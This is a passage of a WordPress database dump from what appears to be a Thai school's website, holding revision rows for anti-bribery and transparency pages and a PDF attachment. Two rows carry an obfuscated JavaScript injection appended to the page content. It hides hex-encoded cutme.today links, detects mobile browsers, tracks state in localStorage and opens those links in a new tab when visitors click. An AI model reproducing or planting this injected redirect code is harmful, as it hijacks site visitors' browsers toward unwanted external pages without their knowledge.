_0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายงานผลตามนโยบาย No Gift Policy','','inherit','closed','closed','','831-revision-v1','','','2024-08-15 11:58:09','2024-08-15 04:58:09','',831,'http://pakhaeng.ssk.in.th/?p=867',0,'revision','',0),
(868,1,'2024-08-15 11:59:13','2024-08-15 04:59:13','','รายงานการรับทรัพย์สิน หรือประโยชน์อื่นใด','','inherit','','closed','','%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%97%e0%b8%a3%e0%b8%b1%e0%b8%9e%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b4%e0%b8%99-%e0%b8%ab','','','2024-08-15 11:59:13','2024-08-15 04:59:13','',836,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานการรับทรัพย์สิน-หรือประโยชน์อื่นใด.pdf',0,'attachment','application/pdf',0),
(869,1,'2024-08-15 11:59:17','2024-08-15 04:59:17','<!-- wp:file {\"id\":868,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานการรับทรัพย์สิน-หรือประโยชน์อื่นใด.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานการรับทรัพย์สิน-หรือประโยชน์อื่นใด.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"รายงานการรับทรัพย์สิน หรือประโยชน์อื่นใด\"></object><a id=\"wp-block-file--media-5f090277-40fa-47cb-88d1-851b9d078401\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานการรับทรัพย์สิน-หรือประโยชน์อื่นใด.pdf\">รายงานการรับทรัพย์สิน หรือประโยชน์อื่นใด</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานการรับทรัพย์สิน-หรือประโยชน์อื่นใด.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-5f090277-40fa-47cb-88d1-851b9d078401\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา','','inherit','closed','closed','','836-revision-v1','','','2024-08-15 11:59:17','2024-08-15 04:59:17','',836,'http://pakhaeng.ssk.in.th/?p=869',0,'revision','',0),
(871,1,'2024-08-19 12:09:32','2024-08-19 05:09:32','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":1259,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2025.png\" alt=\"\" title=\"2025\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#f78da7\",\"titleBgHover\":\"#cf2e2e\",\"titleBgActive\":\"#cf2e2e\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#f78da7\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"cda4f9-0b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tabcda4f9-0b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"size\":16,\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"e71bc9-b1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tabe71bc9-b1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"bab0c3-88\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tabbab0c3-88\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div 